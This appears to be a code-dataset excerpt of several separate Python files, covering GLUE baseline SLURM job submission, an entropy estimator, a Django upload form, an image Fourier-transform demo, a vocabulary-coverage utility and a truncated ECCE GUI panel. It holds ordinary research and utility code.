#single_tasks\n\n# MAKE SURE TO CHANGE ME #\nproj_name = 'glue-baselines'\nrand_search = 0\nn_runs = 1\n\n# embedding stuff\nelmo = 1\ndeep_elmo = 0\ncove = 0\nglove = 0\nattn = 1\n\n# model parameters\nd_hids = ['500', '1000', '1500', '2000']\nn_enc_layers = ['1', '2', '3']\nn_hwy_layers = ['0', '1', '2']\ndrops = ['0.0', '0.1', '0.2', '0.3']\nclassifiers = ['log_reg', 'mlp']\n\n# optimization settings\noptimizers = ['sgd', 'adam']\nlrs = ['1e0', '1e-1']#, '1e-2', '1e-3']\ndecays = ['.2', '.5']\n\n# multi task training settings\nbpp_method = 'percent_tr'\nbpps = [1]\nval_intervals = [10000]\nscales = ['none'] #['max', 'min']\nweighting_method = 'proportional'\n\n###### BEST ######\n\n# best model settings\nbest_d_hid = '1500'\nbest_n_enc_layer = '2'\nbest_n_hwy_layer = '0'\nbest_drop = '0.2'\nbest_classifier = 'mlp'\n\n# best optimizer settings\nbest_optimizer = 'adam'\nbest_lr = .0001 # '1e-3'\nbest_lr_decay = '.2'\nbest_task_patience = 0\nbest_patience = '5'\n\n# best multi task settings\nbest_bpp = 1\nbest_val_interval = 10000\nbest_scale = 'max'\nbest_weighting_method = 'proportional'\n\n#for run_n in range(n_runs):\nfor seed in [str(s) for s in [111]]:\n for task, val_interval in tasks:\n exp_name = 'baseline'\n if elmo:\n exp_name = exp_name + '-elmo'\n exp_name = \"%s-%s\" % (task, exp_name)\n\n if rand_search:\n d_hid = random.choice(d_hids)\n n_enc_layer = random.choice(n_enc_layers)\n n_hwy_layer = random.choice(n_hwy_layers)\n drop = random.choice(drops)\n classifier = random.choice(classifiers)\n lr = random.choice(lrs)\n else:\n d_hid = best_d_hid\n n_enc_layer = best_n_enc_layer\n n_hwy_layer = best_n_hwy_layer\n drop = best_drop\n classifier = best_classifier\n\n optimizer = best_optimizer\n lr = str(best_lr)\n 
lr_decay = best_lr_decay\n task_patience = best_task_patience\n patience = best_patience\n\n bpp = best_bpp\n #val_interval = best_val_interval\n scale = best_scale\n weighting_method = best_weighting_method\n\n if elmo:\n mem_req = 64\n else:\n mem_req = 16\n\n run_name = 'lr%s-s%s' % (lr, str(seed))\n if attn:\n run_name = 'attn-' + run_name\n else:\n run_name = 'noattn-' + run_name\n\n if cove:\n run_name = 'cove-' + run_name\n if elmo:\n run_name = 'elmo-' + run_name\n if not cove and not elmo:\n run_name = 'glove-' + run_name\n run_name = 'singletask-' + run_name\n job_name = '%s_%s' % (run_name, exp_name)\n\n # logging\n exp_dir = '%s/ckpts/%s/%s/%s' % (PATH_PREFIX, proj_name, exp_name, run_name)\n if not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\n out_file = exp_dir + '/sbatch.out'\n err_file = exp_dir + '/sbatch.err'\n\n\n slurm_args = ['sbatch', '-J', job_name, '-e', err_file, '-o', out_file,\n '-t', '2-00:00', '--gres=gpu:%s:1' % gpu_type,\n '--mem=%dGB' % mem_req,\n '--mail-type=end', '--mail-user=aw3272@nyu.edu',\n 'run_stuff.sh']\n exp_args = ['-P', PATH_PREFIX, '-n', exp_name, '-r', run_name,\n '-S', seed, '-T', task, '-C', classifier,\n '-o', optimizer, '-l', lr, '-h', d_hid, '-D', drop,\n '-L', n_enc_layer, '-H', n_hwy_layer,\n '-M', bpp_method, '-B', str(bpp), '-V', str(val_interval),\n '-y', lr_decay, '-K', str(task_patience), '-p', patience,\n '-W', weighting_method, '-s', scale,\n '-q', '-m'] # turn off tqdm\n\n exp_args.append('-b')\n if d_hid == '2000' or 'n_enc_layer' == '3':\n exp_args.append('64')\n else:\n exp_args.append('128')\n\n if elmo:\n exp_args.append('-eg')\n if deep_elmo:\n exp_args.append('-d')\n if not glove:\n exp_args.append('-G')\n if cove:\n exp_args.append('-c')\n if attn:\n exp_args.append('-E')\n exp_args.append('attn')\n\n cmd = slurm_args + exp_args\n print(' '.join(cmd))\n subprocess.call(cmd)\n time.sleep(5)\n","sub_path":"are-16-heads-really-better-than-1/GLUE-baselines/src/submit_single.py","file_name":"submit_single.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162195413","text":"\nimport numpy as np\n#import scipy\n#import matcompat\nfrom consts import EPS\n#import matplotlib.pylab as plt\n\n#not fully processed\n\nfrom range_shuffle import range_shuffle\nfrom probqr import probqr\nfrom range_frac import range_frac\nfrom lagrange3 import lagrange3\nfrom lagrange2 import lagrange2\n\ndef hqr(spk, nt, q, biastype):\n\n assert biastype <= 1\n assert type(q) is int\n # Local Variables: h44, h41, biastype, h2, h0, p22, h4, r44, bias, r41, h42, r43, r42, p44, p43, r22, r21, h22, h21, p42, p41, ns, nt, L, n1, h43, hc2, hc3, hc0, hc1, hc4, hc5, q, p, _srange0, spk, p21, n2, n4\n # Function calls: range_shuffle, log2, lagrange2, floor, sum, lagrange3, eps, range_frac, probqr, hqr, size\n #%This function estimates the response entropy of a set of trials\n #%The result is given in bits\n #%The estimator implemented is chosen by biastype:\n #%Bias correction\n #%hc0: direct\n #%hc1= cuadratic extrap\n #%hc2= naive NOT IMPLEMENTED\n #%hc3= Panzeri NOT IMPLEMENTED\n #%hc4= Montemurro NOT IMPLEMENTED\n #%hc5= Nemenman NOT IMPLEMENTED\n hc0 = 0.\n hc1 = 0.\n hc2 = 0.\n hc3 = 0.\n hc4 = 0.\n hc5 = 0.\n #%ntr=size(spk,3);\n #%spkt=squeeze(spk(1,:,:,:)); \n #L = matcompat.size(spk, 2.)\n L = spk.shape[1]\n #%trials=(reshape(spkt,L,[]))'; %comprising all stimulus conditions\n #%ntr=size(spk,3);\n #ns = matcompat.size(spk, 4.)\n ns = spk.shape[3]\n 
_srange0 = range_shuffle(nt)\n p = probqr(spk, nt, _srange0, q, 1)\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%Direct estimation\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n hc0 = -np.sum((p*np.log2((p+EPS))))\n bias = 0.\n _switch_val=biastype\n #if False: # switch\n # pass\n #elif _switch_val == 1.:\n # bias = 1.\n #elif _switch_val == 8.:\n # bias = 8.\n #\n #\n _switch_val=bias\n #if False: # switch\n # pass\n if _switch_val == 0.:\n bias = 0.\n h0 = hc0\n elif _switch_val == 1.:\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%This is the 3 point extrapolation taking 1/4, 1/2 and 1/1 of the trials\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n _srange0 = range_shuffle(nt)\n r21 = range_frac(_srange0, nt, 2., 1.)\n r22 = range_frac(_srange0, nt, 2., 2.)\n r41 = range_frac(_srange0, nt, 4., 1.)\n r42 = range_frac(_srange0, nt, 4., 2.)\n r43 = range_frac(_srange0, nt, 4., 3.)\n r44 = range_frac(_srange0, nt, 4., 4.)\n p21 = probqr(spk, nt, r21, q, 2.)\n p22 = probqr(spk, nt, r22, q, 2.)\n p41 = probqr(spk, nt, r41, q, 4.)\n p42 = probqr(spk, nt, r42, q, 4.)\n p43 = probqr(spk, nt, r43, q, 4.)\n p44 = probqr(spk, nt, r44, q, 4.)\n h21 = -np.sum((p21*np.log2((p21+EPS))))\n h22 = -np.sum((p22*np.log2((p22+EPS))))\n h41 = -np.sum((p41*np.log2((p41+EPS))))\n h42 = -np.sum((p42*np.log2((p42+EPS))))\n h43 = -np.sum((p43*np.log2((p43+EPS))))\n h44 = -np.sum((p44*np.log2((p44+EPS))))\n h4 = (h41+h42+h43+h44)/4.\n h2 = (h21+h22)/2.\n n1 = np.sum(nt)\n n2 = np.sum(np.floor((nt/2.)))\n n4 = np.sum(np.floor((nt/4.)))\n #%h0=(8*hc0-6*h2+h4)/3; %parabolic extrapolation\n #h0 = lagrange3(np.array(np.hstack((1./n4, 1./n2, 1./n1))), np.array(np.hstack((h4, h2, hc0))), 0.)\n h0 = lagrange3(np.array([1./n4, 1./n2, 1./n1]), np.array([h4, h2, hc0]), 0.)\n #%h0=(-h2*ntr2^2*(ntr-ntr4)+h4*ntr4^2*(ntr-ntr4)+hd*ntr^2*(ntr2-ntr4))/((ntr-ntr2)*(ntr-ntr4)*(ntr2-ntr4));\n #%hst=(4*hd-h21-h22)/2; %linear extrapolation\n elif _switch_val == 2.:\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%Naive correction\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n h0 = 0.\n elif _switch_val == 3.:\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%Panzeri\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n h0 = 0.\n elif _switch_val == 4.:\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%Montemurro\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n h0 = 0.\n elif _switch_val == 5.:\n h0 = 0.\n #%first recover absolute freqs\n #%THIS IS A CHEAT\n #%n=round(ntr*ns*p);\n #%[h0]=saddleentr2(n);;\n elif _switch_val == 8.:\n _srange0 = range_shuffle(nt)\n r21 = range_frac(_srange0, nt, 2., 1.)\n r22 = range_frac(_srange0, nt, 2., 2.)\n p21 = probqr(spk, nt, r21, q, 2.)\n p22 = probqr(spk, nt, r22, q, 2.)\n h21 = -np.sum((p21*np.log2((p21+EPS))))\n h22 = -np.sum((p22*np.log2((p22+EPS))))\n h2 = (h21+h22)/2.\n #%h0=(8*hc0-6*h2+h4)/3; %parabolic extrapolation\n n1 = np.sum(nt)\n n2 = np.sum(np.floor((nt/2.)))\n #h0 = lagrange2(np.array(np.hstack((1./n2, 1./n1))), np.array(np.hstack((h2, hc0))), 0.)\n h0 = lagrange2(np.array([1./n2, 1./n1]), np.array([h2, hc0] ), 0.)\n\n #%error estimation, Latham's\n #%N=ntr;\n #%err=sqrt((sum(p.*log2(p+eps).^2)-(hd*L)^2)/(L*N));\n return h0\n 
","sub_path":"incubator/hqr.py","file_name":"hqr.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224108249","text":"from django import forms\n\nfrom grandchallenge.jqfileupload.widgets import uploader\nfrom grandchallenge.jqfileupload.widgets.uploader import UploadedAjaxFileList\n\ntest_upload_widget = uploader.AjaxUploadWidget(\n ajax_target_path=\"ajax/ulwidget1/\"\n)\ntest_upload_widget2 = uploader.AjaxUploadWidget(\n ajax_target_path=\"ajax/ulwidget2/\", multifile=False\n)\n\n\nclass UploadForm(forms.Form):\n title = forms.CharField(label=\"Blah\")\n something = forms.CharField(label=\"Blabl\")\n upload_form = UploadedAjaxFileList(widget=test_upload_widget)\n upload_form2 = UploadedAjaxFileList(widget=test_upload_widget2)\n","sub_path":"app/grandchallenge/jqfileupload/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"254511447","text":"import cv2\nfrom pylab import *\nimport time\nimport subprocess\n\n\ndef transformada(img, s=None, axes=(-2, -1), norm=None):\n return calcula(img, s, axes, ifft, norm)\n\ndef calcula(a, s=None, axes=None, function=fft, norm=None):\n a = asarray(a)\n s, axes = _cook_nd_args(a, s, axes)\n itl = list(range(len(axes)))\n itl.reverse()\n for ii in itl:\n a = function(a, n=s[ii], axis=axes[ii], norm=norm)\n return a\n\ndef _cook_nd_args(a, s=None, axes=None, invreal=0):\n if s is None:\n shapeless = 1\n if axes is None:\n s = list(a.shape)\n else:\n s = take(a.shape, axes)\n else:\n shapeless = 0\n s = list(s)\n if axes is None:\n axes = list(range(-len(s), 0))\n if len(s) != len(axes):\n raise ValueError(\"Shape and axes have different lengths.\")\n if invreal and shapeless:\n s[-1] = (a.shape[axes[-1]] - 1) * 2\n return s, axes\n\ndef _wrapfunc(obj, method, *args, **kwds):\n try:\n return getattr(obj, method)(*args, **kwds)\n except (AttributeError, TypeError):\n return _wrapit(obj, method, *args, **kwds)\n\n\ndef take(a, indices, axis=None, out=None, mode='raise'):\n return _wrapfunc(a, 'take', indices, axis=axis, out=out, mode=mode)\n\ndef _wrapit(obj, method, *args, **kwds):\n try:\n wrap = obj.__array_wrap__\n except AttributeError:\n wrap = None\n result = getattr(asarray(obj), method)(*args, **kwds)\n if wrap:\n if not isinstance(result):\n result = asarray(result)\n result = wrap(result)\n return result\n\n\n#lendo imagem em tons de cinza\nimg = cv2.imread('imgs/dog-1210559_960_720.jpg',0)\nimg2 = cv2.imread('imgs/índice.jpeg',0)\nimg3 = cv2.imread('imgs/paisagem.jpeg',0)\n\n\n#Fourier\nini = time.time()\nf1 = transformada(img)\nf2 = np.fft.fftshift(f1)\ntimef = time.time()\n\nprint (\"Tempo calculo Fourier imagem menor: \", timef-ini, 'segundos')\n\n#calculando spectro da imagem\nspectre = 20*np.log(np.abs(f2))\n\nf_inverse = np.fft.ifftshift(f2)\nreturns = np.fft.ifft2(f_inverse) #retornando imagem para o dom�nio espacial\nreturns = np.abs(returns)\n\n#Fourier2\nini2 = time.time()\nf3 = transformada(img2)\nf4 = np.fft.fftshift(f3)\ntimef = time.time()\n\nprint (\"Tempo calculo Fourier imagem 920: \", timef-ini, 'segundos')\n\n#calculando spectro da imagem\nspectre2 = 20*np.log(np.abs(f4))\n\nf_inverse2 = np.fft.ifftshift(f4)\nreturns2 = np.fft.ifft2(f_inverse2) #retornando imagem para o dom�nio espacial\nreturns2 = np.abs(returns2)\n\n#Fourier3\nini3 = time.time()\nf5 = transformada(img3)\nf6 = np.fft.fftshift(f5)\ntimef = 
time.time()\n\nprint (\"Tempo calculo Fourier imagem 1920: \", timef-ini, 'segundos')\n\n#calculando spectro da imagem\nspectre3 = 20*np.log(np.abs(f6))\n\nf_inverse3 = np.fft.ifftshift(f6)\nreturns3 = np.fft.ifft2(f_inverse3) #retornando imagem para o dom�nio espacial\nreturns3 = np.abs(returns3)\n\nplt.subplot(131),plt.imshow(img, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Imagem original')\nplt.subplot(132),plt.imshow(spectre, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Spectro')\nplt.subplot(133),plt.imshow(returns, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('imagem retornada')\nplt.show()\nplt.savefig(\"imgs/dog960.png\", dpi = 120)\n\nplt.subplot(131),plt.imshow(img2, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Imagem original')\nplt.subplot(132),plt.imshow(spectre2, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Spectro')\nplt.subplot(133),plt.imshow(returns2, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('imagem retornada')\nplt.axis(\"off\")\nplt.show()\nplt.savefig(\"imgs/dog160.png\", dpi = 120)\nreturn_code = subprocess.call('gimp imgs/dog960.png', shell=True)\n\nplt.subplot(131),plt.imshow(img3, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Imagem original')\nplt.subplot(132),plt.imshow(spectre3, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Spectro')\nplt.subplot(133),plt.imshow(returns3, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('imagem retornada')\nplt.show()\nplt.savefig(\"imgs/dog1920.png\", dpi = 120)\n\n\n\n\n\n\n","sub_path":"spectro.py","file_name":"spectro.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39990098","text":"import re\r\nimport pandas as pd\r\nfrom six import iteritems\r\nfrom collections import Counter\r\n\r\ndef flatten(sequences):\r\n return [entry for seq in sequences for entry in seq]\r\n\r\n\r\ndef get_vocab_dist(tokens): \r\n \r\n return Counter([tok for sent in tokens for tok in sent])\r\n\r\ndef get_vocab(tokens):\r\n \r\n vocab_dist = get_vocab_dist(tokens)\r\n \r\n return set([tok for tok, cnt in vocab_dist.items()])\r\n\r\n\r\ndef fix_vocab(tokens, min_count, unk):\r\n\r\n\r\n # Distribution of open vocabulary\r\n vocab_open_dist = get_vocab_dist(tokens)\r\n \r\n # Open vocabulary\r\n vocab_open = set([tok for tok, cnt in vocab_open_dist.items()])\r\n \r\n # Fix vocabulary\r\n vocab_fixed = set([tok for tok, cnt in vocab_open_dist.items() \\\r\n if cnt >= min_count])\r\n\r\n # Replace OOV with UNK\r\n for i, sent in enumerate(tokens):\r\n for j, tok in enumerate(sent):\r\n if tokens[i][j] not in vocab_fixed:\r\n tokens[i][j] = unk\r\n\r\n # Fix vocabulary\r\n vocab_fixed_dist = get_vocab_dist(tokens)\r\n\r\n\r\n return (tokens, vocab_open_dist, vocab_fixed_dist)\r\n\r\n\r\n\r\n\r\nclass Vocab(object):\r\n \r\n def __init__(self, \\\r\n to_lower=True):\r\n \r\n self.to_lower = to_lower \r\n self.vocab_dict = {}\r\n self.word_count = 0\r\n self.file_count = 0\r\n self.sent_count = 0\r\n \r\n \r\n def add_tokens(self, tokens):\r\n '''\r\n Add tokens to vocabulary dict\r\n tokens: list of tokens OR list of list of tokens\r\n '''\r\n \r\n if len(tokens) > 0:\r\n \r\n # Increment sentence count\r\n self.sent_count += len(tokens)\r\n \r\n # Flatten, if list of list of tokens\r\n if isinstance(tokens[0], list):\r\n tokens = flatten(tokens)\r\n \r\n # Convert to lower case\r\n if self.to_lower:\r\n tokens = [t.lower() for t in tokens]\r\n \r\n # Add to vocab\r\n unique_tokens = set(tokens)\r\n current_vocab = set(self.vocab_dict.keys())\r\n 
missing_vocab = unique_tokens - current_vocab\r\n for tok in missing_vocab:\r\n self.vocab_dict[tok] = 0\r\n \r\n # Count token occurrences\r\n for tok in tokens:\r\n self.vocab_dict[tok] += 1\r\n\r\n # Increment word count\r\n self.word_count += len(tokens)\r\n \r\n \r\n def add_string(self, doc):\r\n self.add_tokens([line.split() for line in doc.splitlines()])\r\n \r\n def add_doc(self, fn=None, tokens=None, str_=None):\r\n '''\r\n Include additional document\r\n '''\r\n # Make sure only one input is not None\r\n ck = len([True for i in [fn, tokens, str_] if i != None]) == 1\r\n msg = 'Must provide exactly one of the following: fn, tokens, str_'\r\n assert ck, msg\r\n \r\n # Read from disk \r\n if fn != None:\r\n with open(fn,'r') as f:\r\n for line in f:\r\n self.add_string(line.strip())\r\n\r\n # Load as tokens\r\n elif tokens != None:\r\n self.add_tokens(tokens)\r\n \r\n # Load as string\r\n elif str_ != None:\r\n self.add_string(str_)\r\n \r\n # Increment file count\r\n self.file_count += 1 \r\n\r\n def add_dir(self, directory, pat='*.*'):\r\n \r\n \r\n # Find all files in directory matching pattern\r\n files = glob.glob(\"{}/{}\".format(directory, pat))\r\n \r\n for fn in files:\r\n self.add_doc(fn)\r\n \r\n\r\n \r\n def vocab_dataframe(self, token_pattern=None):\r\n \r\n # Filter to vocabulary based on pattern\r\n if token_pattern:\r\n regex = re.compile(token_pattern, flags=re.IGNORECASE)\r\n vocab_dict = {k: v for k, v in iteritems(self.vocab_dict) \\\r\n if regex.search(k)}\r\n else:\r\n vocab_dict = self.vocab_dict.copy()\r\n \r\n # Convert vocab dictionary to list of tuple\r\n vocab_list = [(k, v) for k, v in iteritems(vocab_dict)]\r\n \r\n # Create and sort data frame (vocabulary histogram)\r\n df = pd.DataFrame(vocab_list, columns=['token', 'count'])\r\n df.sort_values('count', inplace=True, ascending=False)\r\n \r\n return df\r\n\r\n def summary(self):\r\n text = []\r\n text.append(\"Document count:\\t{}\".format(self.file_count))\r\n text.append(\"Word count:\\t{}\".format(self.word_count))\r\n text.append(\"Vocab size:\\t{}\".format(len(self.vocab_dict.keys())))\r\n text.append(\"Vocab:\\n{}\".format(self.vocab_dataframe()))\r\n return \"\\n\".join(text)\r\n \r\n def __str__(self):\r\n return str(self.vocab_dataframe())\r\n \r\n \r\n def compare_vocab(self, ref_vocab):\r\n '''\r\n Compare vocab with reference vocab\r\n '''\r\n \r\n # Make sure reference vocabulary is a set\r\n ref_vocab = set(ref_vocab)\r\n if self.to_lower:\r\n ref_vocab = set([w.lower() for w in ref_vocab])\r\n \r\n # Get vocab of self\r\n self_vocab = set(self.vocab_dict.keys())\r\n \r\n # Intersection of vocabularies\r\n vocab_intersection = self_vocab.intersection(ref_vocab)\r\n \r\n # Vocabulary coverage\r\n vocab_coverage = len(vocab_intersection)/float(len(self_vocab))\r\n \r\n # Dictionary of OOV tokens with count\r\n OOV_dict = {word:cnt for word, cnt in self.vocab_dict.items() \\\r\n if word not in ref_vocab}\r\n OOV_list = [(word, cnt) for word, cnt in OOV_dict.items()]\r\n OOV_df = pd.DataFrame(OOV_list, columns=['token', 'count'])\r\n OOV_df.sort_values('count', inplace=True, ascending=False)\r\n \r\n # Number of out of vocabulary words\r\n OOV_count = sum([cnt for word, cnt in OOV_dict.items()])\r\n OOV_rate = OOV_count/float(self.word_count)\r\n \r\n # Double check word count\r\n word_count = sum([cnt for word, cnt in self.vocab_dict.items()])\r\n assert word_count == self.word_count, 'Word count mismatch'\r\n \r\n \r\n # Summary of results\r\n summary_dict = {'self_vocab_size': len(self_vocab), \r\n 
'self_word_count': self.word_count, \r\n 'ref_vocab_size': len(ref_vocab), \r\n 'vocab_coverage': vocab_coverage, \r\n 'OOV_count': OOV_count, \r\n 'OOV_rate': OOV_rate}\r\n \r\n \r\n return (summary_dict, OOV_df)\r\n \r\n def compare_vocab_mult(self, ref_vocab_dict):\r\n '''\r\n Compare multiple vocabularies with reference\r\n '''\r\n \r\n summary = []\r\n OOV = []\r\n for name, ref_vocab in ref_vocab_dict.items():\r\n summary_dict, OOV_df = self.compare_vocab(ref_vocab)\r\n \r\n # Add name\r\n summary_dict['ref_vocab'] = name\r\n\r\n # Make 'token' index and rename column\r\n OOV_df.set_index('token', inplace=True)\r\n OOV_df.columns = [name]\r\n \r\n # Append\r\n summary.append(summary_dict)\r\n OOV.append(OOV_df)\r\n \r\n # Build summary data frame and reorder columns\r\n columns = ['self_word_count', 'self_vocab_size', \r\n 'ref_vocab', 'ref_vocab_size', \r\n 'vocab_coverage', 'OOV_count', 'OOV_rate']\r\n summary = pd.DataFrame(summary)\r\n summary = summary[columns]\r\n\r\n \r\n OOV_ = OOV[0]\r\n for oov in OOV[1:]:\r\n OOV_ = OOV_.join(oov, how='outer')\r\n \r\n\r\n \r\n return (summary, OOV_)\r\n \r\n \r\n \r\ndef eval_vocab(tokens, vocab):\r\n \r\n '''\r\n Compare vocab with reference vocab\r\n '''\r\n \r\n # Make sure reference vocabulary is a set\r\n vocab = set(vocab)\r\n \r\n # Flatten tokens\r\n tokens = [tok for sent in tokens for tok in sent]\r\n \r\n # Test vocab\r\n tokens_vocab = set(tokens)\r\n \r\n # Word count\r\n word_count = len(tokens)\r\n \r\n # Intersection of vocabularies\r\n vocab_intersection = tokens_vocab.intersection(vocab)\r\n \r\n # Vocabulary coverage\r\n vocab_coverage = len(vocab_intersection)/float(len(tokens_vocab))\r\n \r\n # Number of out of vocabulary words\r\n OOV_count = sum([1 for tok in tokens if tok not in vocab])\r\n OOV_rate = OOV_count/float(word_count)\r\n \r\n # Summary of results\r\n summary = [ \\\r\n ('token_vocab_size', len(tokens_vocab)), \r\n ('word_count', word_count), \r\n ('vocab_size', len(vocab)), \r\n ('vocab_coverage', vocab_coverage), \r\n ('OOV_count', OOV_count), \r\n ('OOV_rate', OOV_rate)]\r\n \r\n df = pd.DataFrame(summary, columns=['Parameter', 'Value'])\r\n \r\n return df","sub_path":"code/utils/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":9009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"569623260","text":"from templates import *\n\nclass Ged03RunTypeFrame(EcceFrame):\n def __init__(self, parent, title, app, helpURL=\"\"):\n EcceFrame.__init__(self, parent, title)\n panel = Ged03RunTypePanel(self, helpURL)\n self.Finalize()\n\nclass Ged03RunTypePanel(EccePanel):\n def __init__(self, parent, helpURL):\n EccePanel.__init__(self, parent, helpURL)\n\n if (EcceGlobals.RunType == \"Gradient\"):\n gradSizer = EcceBoxSizer(self,\n label = \"Gradient\",\n cols = 2)\n \n if (EcceGlobals.Category == \"SCF\" or\n EcceGlobals.Category == \"DFT\" or\n (EcceGlobals.Category == \"MP\" and\n (EcceGlobals.Theory == \"RMP2\" or\n EcceGlobals.Theory == \"UMP2\" or\n EcceGlobals.Theory == \"RMP3\" or\n EcceGlobals.Theory == \"UMP3\" or\n EcceGlobals.Theory == \"RMP4(SDQ)\" or\n EcceGlobals.Theory == \"UMP4(SDQ)\")) or\n EcceGlobals.Category == \"CI\" or\n (EcceGlobals.Category == \"CC\" and\n (EcceGlobals.Theory == \"RQCISD\" or\n EcceGlobals.Theory == \"UQCISD\" or\n EcceGlobals.Theory == \"RCCD\" or\n EcceGlobals.Theory == \"UCCD\"))):\n gradMethodChoice = [\"Analytic\",\n \"Finite Difference\"]\n elif (EcceGlobals.Category == \"SE\"):\n 
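# semi-empirical (SE) theories expose only the analytic gradient here\n                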
gradMethodChoice = [\"Analytic\"]\n else:\n gradMethodChoice = [\"Finite Difference\"]\n self.gradMethod = EcceComboBox(self,\n choices = gradMethodChoice,\n name = \"ES.Runtype.Gradient.Method\",\n default = 0,\n label = \"Method:\")\n gradSizer.AddWidget(self.gradMethod)\n\n self.panelSizer.Add(gradSizer)\n \n if (EcceGlobals.RunType == \"Geometry\" or\n EcceGlobals.RunType == \"GeoVib\"):\n # GEOMETRY OPTIMIZATION\n geometrySizer = EcceBoxSizer(self,\n label = \"Geometry Optimization\",\n cols = 2)\n \n findChoice = [\"Minimum\",\n \"Transition State\"]\n findDefault = 0\n if (EcceGlobals.ReactionStudyFlag!=0 and\n EcceGlobals.CalculationName==\"Transition-State\"):\n findDefault = 1\n self.find = EcceComboBox(self,\n choices = findChoice,\n name = \"ES.Runtype.GeomOpt.SearchFor\",\n default = findDefault,\n label = \"Find:\")\n if findDefault != 0:\n self.find.export = 1\n geometrySizer.AddWidget(self.find)\n \n # CONVERGENCE\n convergenceSizer = EcceBoxSizer(self,\n label = \"Convergence\",\n cols = 3)\n \n gradientChoice = [\"Loose\",\n \"Medium\",\n \"Tight\",\n \"Very Tight\"]\n self.gradient = EcceComboBox(self,\n choices = gradientChoice,\n name = \"ES.Runtype.GeomOpt.ConvergenceGradient\",\n default = 1,\n label = \"Gradient:\")\n convergenceSizer.AddWidget(self.gradient)\n \n self.stepCheckBox = EcceCheckBox(self,\n label = \" Max Steps:\",\n name = \"ES.Runtype.GeomOpt.MaximumSteps\",\n default = 0)\n convergenceSizer.AddWidget(self.stepCheckBox)\n \n self.stepSpin = EcceSpinCtrl(self,\n hardRange = \"[1..)\",\n softRange = \"[1..100]\",\n name = \"ES.Runtype.GeomOpt.MaximumStepsValue\",\n default = 20,\n export = 1)\n convergenceSizer.AddWidget(self.stepSpin)\n \n # HESSIAN\n hessianSizer = EcceBoxSizer(self,\n label = \"Hessian\",\n cols = 2)\n \n if (EcceGlobals.Category == \"SCF\" or\n EcceGlobals.Category == \"DFT\" or\n (EcceGlobals.Category == \"MP\" and\n (EcceGlobals.Theory == \"RMP2\" or\n EcceGlobals.Theory == \"UMP2\" or\n EcceGlobals.Theory == \"RMP3\" or\n EcceGlobals.Theory == \"UMP3\" or\n EcceGlobals.Theory == \"RMP4(SDQ)\" or\n EcceGlobals.Theory == \"UMP4(SDQ)\")) or\n (EcceGlobals.Category == \"CC\" and\n (EcceGlobals.Theory == \"RQCISD\" or\n EcceGlobals.Theory == \"UQCISD\"))):\n self.hessianChoice = [\"Valence Force Field\",\n \"Calculate\"]\n else:\n self.hessianChoice = [\"Valence Force Field\"]\n self.hessian = EcceComboBox(self,\n choices = self.hessianChoice,\n name = \"ES.Runtype.GeomOpt.InitialHessian\",\n default = 1,\n label = \"Initial Source:\")\n hessianSizer.AddWidget(self.hessian)\n \n self.panelSizer.Add(geometrySizer)\n self.panelSizer.Add(convergenceSizer)\n self.panelSizer.Add(hessianSizer)\n \n if EcceGlobals.RunType == \"Polarizability\":\n polarSizer = EcceBoxSizer(self,\n label = \"Polarizability\",\n cols = 1)\n\n if (EcceGlobals.Theory == \"RHF\" or\n EcceGlobals.Theory == \"UHF\" or\n EcceGlobals.Category == \"DFT\" or\n EcceGlobals.Theory == \"RMP2\" or\n EcceGlobals.Theory == \"UMP2\"):\n polarMethodChoice = [\"Analytic Polariz. 
